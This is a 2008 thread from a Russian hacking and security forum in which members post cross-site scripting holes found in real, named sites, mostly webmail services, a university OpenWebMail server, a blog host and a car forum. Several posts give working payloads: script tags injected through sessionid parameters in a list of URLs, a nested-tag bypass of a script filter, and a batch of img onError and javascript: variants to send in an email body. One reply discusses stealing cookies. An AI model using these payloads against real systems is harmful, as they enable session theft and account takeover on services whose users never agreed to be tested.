ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #231  
Старый 07.08.2008, 08:13
Bonnie and Clyde
Новичок
Регистрация: 26.07.2008
Сообщений: 20
Провел на форуме:
154110

Репутация: 14
По умолчанию

Активная XSS в бесплатной почтовой системе NextMail.ru
@nextmail.ru
@nxt.ru
@epage.ru
@email.su
@student.su
@hu2.ru
@xaker.ru
@mail2k.ru
@dezigner.ru
@programist.ru
@onlymail.ru
@logmail.ru
Отправляем письмо адресату с прикрепленным файлом, в прикрепленном файле пишем код.
(прим.: <script>alert(document.coocke);</script>)

XSS работает только(!) в IE (по крайней мере у меня в Опере и Мозилле не сработало)
 
Ответить с цитированием

  #232  
Старый 07.08.2008, 08:31
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Bonnie and Clyde, работает и в ие, и в опере, и в фф:
https://forum.antichat.ru/showpost.php?p=779537&postcount=229
 
Ответить с цитированием

  #233  
Старый 08.08.2008, 12:28
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-send.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-advsearch.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-folder.pl?action=editfolders&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-prefs.pl?action=editprefs&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-abook.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-main.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-read.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-cal.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-webdisk.pl?action=showdir&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
 
Ответить с цитированием

  #234  
Старый 10.08.2008, 14:30
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

Блог:
http://blogspot.com/

пример первой попавшейся xss. при создании своего блога вписываем алер и:
http://1111vvv.blogspot.com/
 
Ответить с цитированием

  #235  
Старый 10.08.2008, 21:28
NFM
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
Провел на форуме:
5120686

Репутация: 531


По умолчанию

от нее смысла нету. куки она не передает так как куки идут с блогера. только если связку ставить или редирект
 
Ответить с цитированием

  #236  
Старый 13.08.2008, 13:49
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

http://mymail-in.net/
срабатывает 11 XSS в теле письма. проверено с помощью "SMTP XSS Tester v1.0"
// Наверное это можно считать за активную xss?
 
Ответить с цитированием

  #237  
Старый 13.08.2008, 20:58
echobyte
Moderator - Level 7
Регистрация: 07.03.2008
Сообщений: 568
Провел на форуме:
4140471

Репутация: 708


Отправить сообщение для echobyte с помощью ICQ
По умолчанию

http://nexile.ru/href/5713.html

В обьявлениях фильтруется script
соответственно "><scr<script>ipt>alert()</scr</script>ipt>
 
Ответить с цитированием

  #238  
Старый 14.08.2008, 09:59
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

Сервер: mail.km.ru
зарегал мыло на http://bossmail.ru/
создаем письмо, вписываем в него алерты с таким телом письма:
Код:
<body>
<img src="a"onError=alert(121)>
<img src='a'onError=alert(122)>
<img src=javascript&#13:alert(79)>
<img src=javascript&#10:alert(68)>
<img src=javascript&#9:alert(57)>
<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert(46)>
<img src=javascript:alert(16)>
</body>
открываем письмо у себя в папке или отправляем его с небольшими изменениями ; )

Последний раз редактировалось Calcutta; 15.08.2008 в 05:44..
 
Ответить с цитированием

  #239  
Старый 14.08.2008, 18:54
echobyte
Moderator - Level 7
Регистрация: 07.03.2008
Сообщений: 568
Провел на форуме:
4140471

Репутация: 708


Отправить сообщение для echobyte с помощью ICQ
По умолчанию

http://fotocelebrity.net/anna-seminovich/anna-seminovich27.php
 
Ответить с цитированием

xss
  #240  
Старый 15.08.2008, 16:39
NApoleonchik
Участник форума
Регистрация: 04.07.2007
Сообщений: 111
Провел на форуме:
486797

Репутация: 102
Отправить сообщение для NApoleonchik с помощью ICQ
По умолчанию xss

PR 2
тИЦ 10


http://www.auto-magnitola.ru/forum/index.php

Уязвимы все поля в форуме. Ничего не фильтруется

))

Последний раз редактировалось NApoleonchik; 15.08.2008 в 16:41..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ